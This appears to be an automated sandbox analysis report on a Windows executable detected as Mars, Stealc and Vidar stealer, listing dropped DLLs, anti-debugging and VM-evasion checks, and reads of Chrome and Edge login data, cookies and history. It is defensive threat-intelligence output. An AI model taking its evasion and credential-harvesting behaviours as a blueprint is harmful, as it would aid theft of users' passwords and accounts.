Source: C:\Users\user\Desktop\FFAk2gixx5.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\mozglue[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\vcruntime140[1].dll	Jump to dropped file

Drops PE files to the application program directory (C:\ProgramData)

Source: C:\Users\user\Desktop\FFAk2gixx5.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file

Extensive use of GetProcAddress (often used to hide API calls)

Source: C:\Users\user\Desktop\FFAk2gixx5.exe

0_2_00416230

Malware Analysis System Evasion

Found evasive API chain (may stop execution after checking locale)

Source: C:\Users\user\Desktop\FFAk2gixx5.exe

Evasive API call chain: GetUserDefaultLangID, ExitProcess

Found dropped PE file which has not been started or loaded

Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\softokn3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Dropped PE file which has not been started: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Dropped PE file which has not been started: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\freebl3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\msvcp140[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Dropped PE file which has not been started: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\nss3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\mozglue[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Dropped PE file which has not been started: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Dropped PE file which has not been started: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Dropped PE file which has not been started: C:\ProgramData\softokn3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\vcruntime140[1].dll	Jump to dropped file

Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Code function: 0_2_0040B610 FindFirstFileA,StrCmpCA,StrCmpCA,GetSystemTimes,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,	0_2_0040B610
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Code function: 0_2_0040DB60 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,	0_2_0040DB60
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Code function: 0_2_0040D540 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_0040D540
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Code function: 0_2_00412570 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_00412570
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Code function: 0_2_0040D1C0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	0_2_0040D1C0
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Code function: 0_2_004015C0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_004015C0
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Code function: 0_2_004121F0 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,	0_2_004121F0
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Code function: 0_2_00411650 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,	0_2_00411650
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Code function: 0_2_00411B80 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,	0_2_00411B80
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Code function: 0_2_02FD27D7 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_02FD27D7
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Code function: 0_2_02FCD7A7 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_02FCD7A7
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Code function: 0_2_02FD18B7 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,	0_2_02FD18B7
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Code function: 0_2_02FCB877 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,	0_2_02FCB877
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Code function: 0_2_02FD2457 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,	0_2_02FD2457
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Code function: 0_2_02FC1827 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_02FC1827
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Code function: 0_2_02FCD427 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	0_2_02FCD427
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Code function: 0_2_02FD1DE7 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,	0_2_02FD1DE7
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Code function: 0_2_02FCDDC7 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,	0_2_02FCDDC7

Source: C:\Users\user\Desktop\FFAk2gixx5.exe

Code function: 0_2_00401120 GetSystemInfo,ExitProcess,

0_2_00401120

Source: C:\Users\user\Desktop\FFAk2gixx5.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior

Source: DBFIDGII.0.dr	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
Source: DBFIDGII.0.dr	Binary or memory string: secure.bankofamerica.comVMware20,11696487552\|UE
Source: DBFIDGII.0.dr	Binary or memory string: account.microsoft.com/profileVMware20,11696487552u
Source: DBFIDGII.0.dr	Binary or memory string: discord.comVMware20,11696487552f
Source: DBFIDGII.0.dr	Binary or memory string: bankofamerica.comVMware20,11696487552x
Source: DBFIDGII.0.dr	Binary or memory string: www.interactivebrokers.comVMware20,11696487552}
Source: FFAk2gixx5.exe, 00000000.00000002.3315706201.0000000002CAB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: DBFIDGII.0.dr	Binary or memory string: ms.portal.azure.comVMware20,11696487552
Source: FFAk2gixx5.exe, 00000000.00000002.3315706201.0000000002C87000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWen-GBn
Source: DBFIDGII.0.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552
Source: DBFIDGII.0.dr	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
Source: DBFIDGII.0.dr	Binary or memory string: global block list test formVMware20,11696487552
Source: DBFIDGII.0.dr	Binary or memory string: tasks.office.comVMware20,11696487552o
Source: DBFIDGII.0.dr	Binary or memory string: AMC password management pageVMware20,11696487552
Source: DBFIDGII.0.dr	Binary or memory string: interactivebrokers.co.inVMware20,11696487552d
Source: DBFIDGII.0.dr	Binary or memory string: interactivebrokers.comVMware20,11696487552
Source: DBFIDGII.0.dr	Binary or memory string: dev.azure.comVMware20,11696487552j
Source: DBFIDGII.0.dr	Binary or memory string: Interactive Brokers - HKVMware20,11696487552]
Source: DBFIDGII.0.dr	Binary or memory string: microsoft.visualstudio.comVMware20,11696487552x
Source: DBFIDGII.0.dr	Binary or memory string: netportal.hdfcbank.comVMware20,11696487552
Source: FFAk2gixx5.exe, 00000000.00000002.3315706201.0000000002C4C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW`w
Source: DBFIDGII.0.dr	Binary or memory string: trackpan.utiitsl.comVMware20,11696487552h
Source: FFAk2gixx5.exe, 00000000.00000002.3315706201.0000000002C4C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware^
Source: DBFIDGII.0.dr	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
Source: DBFIDGII.0.dr	Binary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
Source: DBFIDGII.0.dr	Binary or memory string: outlook.office365.comVMware20,11696487552t
Source: DBFIDGII.0.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
Source: FFAk2gixx5.exe, 00000000.00000002.3315706201.0000000002C4C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware
Source: DBFIDGII.0.dr	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
Source: DBFIDGII.0.dr	Binary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
Source: DBFIDGII.0.dr	Binary or memory string: outlook.office.comVMware20,11696487552s
Source: DBFIDGII.0.dr	Binary or memory string: Test URL for global passwords blocklistVMware20,11696487552
Source: DBFIDGII.0.dr	Binary or memory string: turbotax.intuit.comVMware20,11696487552t
Source: DBFIDGII.0.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696487552x
Source: DBFIDGII.0.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696487552}
Source: DBFIDGII.0.dr	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552

Source: C:\Users\user\Desktop\FFAk2gixx5.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	API call chain: ExitProcess graph end node

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Source: C:\Users\user\Desktop\FFAk2gixx5.exe

Code function: 0_2_00417B3E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

0_2_00417B3E

Contains functionality to dynamically determine API calls

Source: C:\Users\user\Desktop\FFAk2gixx5.exe

0_2_00416230

Contains functionality to read the PEB

Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Code function: 0_2_00415DB0 mov eax, dword ptr fs:[00000030h]	0_2_00415DB0
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Code function: 0_2_02C37B13 push dword ptr fs:[00000030h]	0_2_02C37B13
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Code function: 0_2_02FD6017 mov eax, dword ptr fs:[00000030h]	0_2_02FD6017
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Code function: 0_2_02FC0D90 mov eax, dword ptr fs:[00000030h]	0_2_02FC0D90
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Code function: 0_2_02FC092B mov eax, dword ptr fs:[00000030h]	0_2_02FC092B

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Source: C:\Users\user\Desktop\FFAk2gixx5.exe

Code function: 0_2_00404C70 GetProcessHeap,RtlAllocateHeap,InternetOpenA,InternetOpenUrlA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,

0_2_00404C70

Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Code function: 0_2_00419DB7 SetUnhandledExceptionFilter,	0_2_00419DB7
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Code function: 0_2_00417B3E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_00417B3E
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Code function: 0_2_004173CD memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_004173CD
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Code function: 0_2_61EAF900 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,abort,	0_2_61EAF900
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Code function: 0_2_02FD7634 memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_02FD7634
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Code function: 0_2_02FDA01E SetUnhandledExceptionFilter,	0_2_02FDA01E
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Code function: 0_2_02FD7DA5 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_02FD7DA5

HIPS / PFW / Operating System Protection Evasion

Searches for specific processes (likely to inject)

Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Code function: 0_2_00415CF0 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,		0_2_00415CF0
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Code function: 0_2_02FD5F57 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,		0_2_02FD5F57

Contains functionality to query locales information (e.g. system language)

Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,		0_2_00414560
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,		0_2_02FD47C7

Queries information about the installed CPU (vendor, model number etc)

Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior

Queries the volume information (name, serial number etc) of a device

Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior

Source: C:\Users\user\Desktop\FFAk2gixx5.exe

0_2_0040B610

Source: C:\Users\user\Desktop\FFAk2gixx5.exe

Code function: 0_2_004143B0 GetProcessHeap,HeapAlloc,GetUserNameA,

0_2_004143B0

Source: C:\Users\user\Desktop\FFAk2gixx5.exe

Code function: 0_2_004144A0 GetProcessHeap,HeapAlloc,GetTimeZoneInformation,wsprintfA,

0_2_004144A0

Stealing of Sensitive Information

Yara detected Mars stealer

Source: Yara match	File source: 0.2.FFAk2gixx5.exe.2fc0e67.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.FFAk2gixx5.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.FFAk2gixx5.exe.2ff0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.FFAk2gixx5.exe.2ff0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.FFAk2gixx5.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.FFAk2gixx5.exe.2fc0e67.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.3315854062.0000000002FC0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.3314009365.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2531825122.0000000002FF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Yara detected Stealc

Source: Yara match	File source: 00000000.00000002.3315706201.0000000002C4C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: FFAk2gixx5.exe PID: 6784, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match	File source: 0.2.FFAk2gixx5.exe.2fc0e67.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.FFAk2gixx5.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.FFAk2gixx5.exe.2ff0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.FFAk2gixx5.exe.2ff0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.FFAk2gixx5.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.FFAk2gixx5.exe.2fc0e67.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.3315854062.0000000002FC0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.3314009365.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2531825122.0000000002FF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\FFAk2gixx5.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History-journal	Jump to behavior
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior

Yara detected Credential Stealer

Source: Yara match

File source: Process Memory Space: FFAk2gixx5.exe PID: 6784, type: MEMORYSTR

Remote Access Functionality

Yara detected Mars stealer

Source: Yara match	File source: 0.2.FFAk2gixx5.exe.2fc0e67.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.FFAk2gixx5.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.FFAk2gixx5.exe.2ff0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.FFAk2gixx5.exe.2ff0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.FFAk2gixx5.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.FFAk2gixx5.exe.2fc0e67.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.3315854062.0000000002FC0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.3314009365.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2531825122.0000000002FF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Yara detected Stealc

Source: Yara match	File source: 00000000.00000002.3315706201.0000000002C4C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: FFAk2gixx5.exe PID: 6784, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match	File source: 0.2.FFAk2gixx5.exe.2fc0e67.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.FFAk2gixx5.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.FFAk2gixx5.exe.2ff0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.FFAk2gixx5.exe.2ff0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.FFAk2gixx5.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.FFAk2gixx5.exe.2fc0e67.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.3315854062.0000000002FC0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.3314009365.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2531825122.0000000002FF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Code function: 0_2_61E1307A sqlite3_transfer_bindings,	0_2_61E1307A
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Code function: 0_2_61E2D5E6 sqlite3_bind_int64,	0_2_61E2D5E6
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Code function: 0_2_61E2D595 sqlite3_bind_double,	0_2_61E2D595
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Code function: 0_2_61E0B431 sqlite3_clear_bindings,	0_2_61E0B431
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Code function: 0_2_61E037F3 sqlite3_value_frombind,	0_2_61E037F3
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Code function: 0_2_61E2D781 sqlite3_bind_zeroblob64,	0_2_61E2D781
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Code function: 0_2_61E2D714 sqlite3_bind_zeroblob,	0_2_61E2D714
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Code function: 0_2_61E2D68C sqlite3_bind_pointer,	0_2_61E2D68C
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Code function: 0_2_61E2D65B sqlite3_bind_null,	0_2_61E2D65B
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Code function: 0_2_61E2D635 sqlite3_bind_int,	0_2_61E2D635
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Code function: 0_2_61E2D9B0 sqlite3_bind_value,	0_2_61E2D9B0
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Code function: 0_2_61E2D981 sqlite3_bind_text16,	0_2_61E2D981
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Code function: 0_2_61E2D945 sqlite3_bind_text64,	0_2_61E2D945
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Code function: 0_2_61E2D916 sqlite3_bind_text,	0_2_61E2D916
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Code function: 0_2_61E2D8E7 sqlite3_bind_blob64,	0_2_61E2D8E7
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Code function: 0_2_61E038CA sqlite3_bind_parameter_count,	0_2_61E038CA
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Code function: 0_2_61E158CA sqlite3_bind_parameter_index,	0_2_61E158CA
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Code function: 0_2_61E038DC sqlite3_bind_parameter_name,	0_2_61E038DC
Source: C:\Users\user\Desktop\FFAk2gixx5.exe	Code function: 0_2_61E2D8B8 sqlite3_bind_blob,	0_2_61E2D8B8

ID:	1436574
Product:	CloudBasic
Start time:	02:51:03
Start date:	06.05.2024
Sample:	FFAk2gixx5.exe
Cookbook:	default.jbs
System description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Architecture:	WINDOWS
MD5:	14cd6d9cbad80b0e4076212bf7ad937f
SHA1:	6f553fad2fd973d52dec55582490eb8c3a35b6e1
SHA256:	1738d5ec9cf4a62d3bebdb8690d208dc4e9bb957ba427233920a2195b04bb52e
Filetype:	Win32 Executable (generic) a (10002005/4) 99.96%

Windows Analysis Report
FFAk2gixx5.exe

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel
Provided by

Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

Name	Type	MD5	SHA1	SHA256
